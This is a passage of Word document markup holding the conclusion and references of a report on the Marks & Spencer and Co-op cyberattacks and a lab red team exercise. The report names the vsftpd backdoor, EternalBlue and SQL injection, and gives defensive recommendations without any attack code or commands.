        <w:t>The cyberattacks targeting Marks &amp; Spencer and the Co-operative Group signify two of the most significant cyber events in the history of UK retail, leading to a combined financial loss exceeding £380 million and causing weeks of operational disruption for both companies. When examined collectively, these incidents highlight not merely isolated shortcomings but rather a pervasive pattern of vulnerability that affects the entire UK retail industry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E58DCA4" w14:textId="77777777" w:rsidR="00980408" w:rsidRDefault="00980408" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66BF3201" w14:textId="49932E02" w:rsidR="00D85E16" w:rsidRDefault="00D85E16" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D85E16">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>The tactics employed by adversaries outlined in this report — which include initial access through stolen credentials, privilege escalation, lateral movement, data exfiltration, and the deployment of ransomware — are closely aligned with the MITRE ATT&amp;CK framework. They illustrate the complex, multi-stage approach typical of financially motivated threat groups like Scattered Spider. The severity of these attacks was not merely due to the attackers' technical skills, but rather the combination of vulnerabilities they exploited: poor identity governance, lack of adequate network segmentation, excessive dependence on third-party vendors without sufficient oversight, and a workforce that was ill-equipped to identify or counter advanced social engineering tactics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E6319D" w14:textId="77777777" w:rsidR="00980408" w:rsidRDefault="00980408" w:rsidP="007E2733">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C59FC2" w14:textId="22155838" w:rsidR="007E2733" w:rsidRDefault="007E2733" w:rsidP="007E2733">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">The engagement of the red team conducted against the simulated environment of ABCD Ltd further illustrated how these identical attack patterns occur in practice. Through three separate exploit chains — the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4 backdoor on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> MS17-010 vulnerability on Windows 7, and SQL injection targeting the OWASP BWA platform — the assessment validated that unpatched systems, the absence of network monitoring, and the lack of endpoint detection controls foster a permissive environment where an attacker can advance from initial reconnaissance to complete data exfiltration with minimal resistance. Importantly, none of the simulated attack phases activated a defensive alert, underscoring the seriousness of the detection gap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258EC559" w14:textId="77777777" w:rsidR="007E2733" w:rsidRDefault="007E2733" w:rsidP="007E2733">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7135A213" w14:textId="77777777" w:rsidR="007E2733" w:rsidRDefault="007E2733" w:rsidP="007E2733">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>The analysis of the detection gap and the remediation recommendations outlined in this report tackle these shortcomings across three priority levels. Immediate action is necessary for critical vulnerabilities, including legacy software with known backdoors, unpatched operating systems vulnerable to publicly disclosed exploits, and web applications that lack fundamental input validation. Medium-term investments should concentrate on implementing intrusion detection systems, endpoint detection and response tools, and data loss prevention measures. At a strategic level, organizations must integrate cybersecurity governance into their operational culture — ensuring that security policies are not only documented but also actively enforced, tested, and refined in response to an evolving threat landscape.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31979C54" w14:textId="77777777" w:rsidR="007E2733" w:rsidRDefault="007E2733" w:rsidP="007E2733">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E76F9F2" w14:textId="20550BDF" w:rsidR="007E2733" w:rsidRDefault="007E2733" w:rsidP="007E2733">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>The overarching lesson from these incidents is that achieving cybersecurity resilience cannot rely solely on technology. The human element — from help desk staff vulnerable to social engineering to leadership teams that underestimate the operational reliance on digital systems — remains a critical factor in every breach. Organizations that regard security awareness, identity governance, and incident response planning as true operational priorities, rather than mere compliance requirements, will be significantly better positioned to withstand threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371E9820" w14:textId="77777777" w:rsidR="009D52D3" w:rsidRDefault="009D52D3" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="515D5145" w14:textId="77777777" w:rsidR="009D52D3" w:rsidRDefault="009D52D3" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1818B29D" w14:textId="77777777" w:rsidR="009D52D3" w:rsidRDefault="009D52D3" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E84F24F" w14:textId="77777777" w:rsidR="009D52D3" w:rsidRDefault="009D52D3" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA3CB01" w14:textId="77777777" w:rsidR="009D52D3" w:rsidRDefault="009D52D3" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A80D33" w14:textId="77777777" w:rsidR="009D52D3" w:rsidRDefault="009D52D3" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C613096" w14:textId="77777777" w:rsidR="009D52D3" w:rsidRDefault="009D52D3" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D3CED07" w14:textId="77777777" w:rsidR="009D52D3" w:rsidRDefault="009D52D3" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605218D6" w14:textId="77777777" w:rsidR="009D52D3" w:rsidRDefault="009D52D3" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5167BA95" w14:textId="655DF377" w:rsidR="00E82E8E" w:rsidRDefault="00E82E8E" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>REFERENCE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF2A838" w14:textId="77777777" w:rsidR="00E82E8E" w:rsidRDefault="00E82E8E" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60DCC863" w14:textId="442D0E41" w:rsidR="002105FF" w:rsidRDefault="00B209D7" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00B209D7">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="OLE_LINK2"/>
      <w:r w:rsidRPr="00B209D7">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">The Review Hive, “Marks &amp; Spencer Cyberattack: Full Timeline, Impact, Lessons,” 2025.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId57" w:history="1">
        <w:r w:rsidR="00651D6C" w:rsidRPr="00227CD6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:eastAsia="en-GB"/>
          </w:rPr>
          <w:t>https://thereviewhive.blog/marks-spencer-cyberattack-recovery-timeline-impact/</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidR="00A6690F">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FE6131" w14:textId="77777777" w:rsidR="00EE77A9" w:rsidRDefault="00EE77A9" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F3A60E9" w14:textId="00AC479B" w:rsidR="002105FF" w:rsidRDefault="002105FF" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002105FF">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] MITRE Corporation, “MITRE ATT&amp;CK® Enterprise Matrix,” 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId58" w:history="1">
        <w:r w:rsidRPr="00005728">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:eastAsia="en-GB"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002105FF">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E52414" w14:textId="77777777" w:rsidR="002105FF" w:rsidRDefault="002105FF" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6FBBA2" w14:textId="29646B98" w:rsidR="00C66FA7" w:rsidRDefault="00C66FA7" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66FA7">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[3] National Cyber Security Centre, “Mitigating Malware and Ransomware Attacks,” 2023.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r w:rsidRPr="00005728">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:eastAsia="en-GB"/>
          </w:rPr>
          <w:t>https://www.ncsc.gov.uk/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C66FA7">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A06902" w14:textId="77777777" w:rsidR="00C66FA7" w:rsidRDefault="00C66FA7" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF5CFAC" w14:textId="08E98AED" w:rsidR="00C66FA7" w:rsidRDefault="00DE0ACA" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE0ACA">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">4] Microsoft, “Identity Security: Preventing Credential Attacks,” 2023.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidRPr="00005728">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:eastAsia="en-GB"/>
          </w:rPr>
          <w:t>https://learn.microsoft.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DE0ACA">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF55641" w14:textId="77777777" w:rsidR="00DE0ACA" w:rsidRDefault="00DE0ACA" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33BB76C2" w14:textId="4CE72D6C" w:rsidR="00DE0ACA" w:rsidRDefault="00DE0ACA" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE0ACA">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[5] European Union Agency for Cybersecurity (ENISA), “Threat Landscape for Supply Chain Attacks,” 2023 </w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r w:rsidR="00543DF7" w:rsidRPr="00005728">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:eastAsia="en-GB"/>
          </w:rPr>
          <w:t>https://www.enisa.europa.eu/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DE0ACA">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39605231" w14:textId="77777777" w:rsidR="00543DF7" w:rsidRDefault="00543DF7" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2901119D" w14:textId="08B24610" w:rsidR="00543DF7" w:rsidRDefault="00F13892" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13892">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[6] CrowdStrike, “2024 Global Threat Report,” 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:history="1">
        <w:r w:rsidRPr="00005728">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:eastAsia="en-GB"/>
          </w:rPr>
          <w:t>https://www.crowdstrike.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F13892">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6F93E4" w14:textId="77777777" w:rsidR="00F13892" w:rsidRDefault="00F13892" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15F75831" w14:textId="5B7B768B" w:rsidR="00F13892" w:rsidRDefault="00F13892" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13892">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>[7] IBM Security, “Cost of a Data Breach Report,” 2024.https://www.ibm.com/security/data-breach (ibm.com in Bing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25405FB0" w14:textId="77777777" w:rsidR="00E65573" w:rsidRDefault="00E65573" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A284F0E" w14:textId="41BBEABB" w:rsidR="0068337C" w:rsidRDefault="00E65573" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[8] </w:t>
      </w:r>
      <w:r w:rsidR="004D2D49" w:rsidRPr="004D2D49">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI), "Cybersecurity advisory: Scattered Spider (AA23-320A)," CISA, Nov. 2023, updated Jul. 2025.  https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D61B186" w14:textId="77777777" w:rsidR="004D2D49" w:rsidRDefault="004D2D49" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48BB1B46" w14:textId="7E8E51C6" w:rsidR="004D2D49" w:rsidRDefault="004D2D49" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[9] </w:t>
      </w:r>
      <w:r w:rsidR="00BB7E15" w:rsidRPr="00BB7E15">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">National Cyber Security Centre (NCSC), "NCSC Annual Review 2025," GCHQ/NCSC, Oct. 2025.  https://www.ncsc.gov.uk/collection/ncsc-annual-review-2025. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44450B60" w14:textId="77777777" w:rsidR="00BB7E15" w:rsidRDefault="00BB7E15" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="480484BF" w14:textId="6DB67A73" w:rsidR="00BB7E15" w:rsidRDefault="00BB7E15" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[10] </w:t>
      </w:r>
      <w:r w:rsidR="002C7A51" w:rsidRPr="002C7A51">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK, "Scattered Spider — Group G1015," MITRE ATT&amp;CK Enterprise, 2024. https://attack.mitre.org/groups/G1015/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F8B55E" w14:textId="77777777" w:rsidR="00577E70" w:rsidRDefault="00577E70" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DC76F2E" w14:textId="4C231B86" w:rsidR="00577E70" w:rsidRDefault="00577E70" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[11] </w:t>
      </w:r>
      <w:r w:rsidRPr="00577E70">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>National Institute of Standards and Technology (NIST), "Cybersecurity supply chain risk management practices for systems and organisations, SP 800-161 Rev. 1," NIST, May 2022.  https://csrc.nist.gov/publications/detail/sp/800-161/rev-1/final.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749100AB" w14:textId="77777777" w:rsidR="004C3018" w:rsidRDefault="004C3018" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D1E352" w14:textId="798C772E" w:rsidR="004C3018" w:rsidRDefault="004C3018" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[12] </w:t>
      </w:r>
      <w:r w:rsidRPr="004C3018">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft, "Octo Tempest crosses boundaries to facilitate extortion, encryption, and destruction," Microsoft Security Blog, Oct. 2023. https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F744DD5" w14:textId="77777777" w:rsidR="00D774EF" w:rsidRDefault="00D774EF" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7577B15B" w14:textId="6B8D73DE" w:rsidR="00D774EF" w:rsidRDefault="00F74BE0" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="002A353F">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">13] </w:t>
      </w:r>
      <w:hyperlink r:id="rId63" w:history="1">
        <w:r w:rsidR="007F75BA" w:rsidRPr="00227CD6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:eastAsia="en-GB"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2011-2523</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="183E111C" w14:textId="77777777" w:rsidR="007F75BA" w:rsidRDefault="007F75BA" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46679E9B" w14:textId="34CF1317" w:rsidR="007F75BA" w:rsidRDefault="0038444C" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[14] </w:t>
      </w:r>
      <w:hyperlink r:id="rId64" w:history="1">
        <w:r w:rsidR="00282E23" w:rsidRPr="00227CD6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:eastAsia="en-GB"/>
          </w:rPr>
          <w:t>https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76D63362" w14:textId="77777777" w:rsidR="00282E23" w:rsidRDefault="00282E23" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7886CDAC" w14:textId="25DFD17A" w:rsidR="00282E23" w:rsidRDefault="00282E23" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[15] </w:t>
      </w:r>
      <w:hyperlink r:id="rId65" w:history="1">
        <w:r w:rsidRPr="00227CD6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:eastAsia="en-GB"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/49757</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="596B7F95" w14:textId="77777777" w:rsidR="00282E23" w:rsidRDefault="00282E23" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0351F14E" w14:textId="28FD082B" w:rsidR="00653DEA" w:rsidRDefault="00653DEA" w:rsidP="0068337C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[16] </w:t>
      </w:r>
      <w:r w:rsidRPr="00653DEA">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Microsoft, "Microsoft Security Bulletin MS17-010 — Critical: Security update for Microsoft Windows SMB server," Microsoft Security, Mar. 2017.  https://learn.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F072D10" w14:textId="476D8196" w:rsidR="00E65573" w:rsidRDefault="00E65573" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
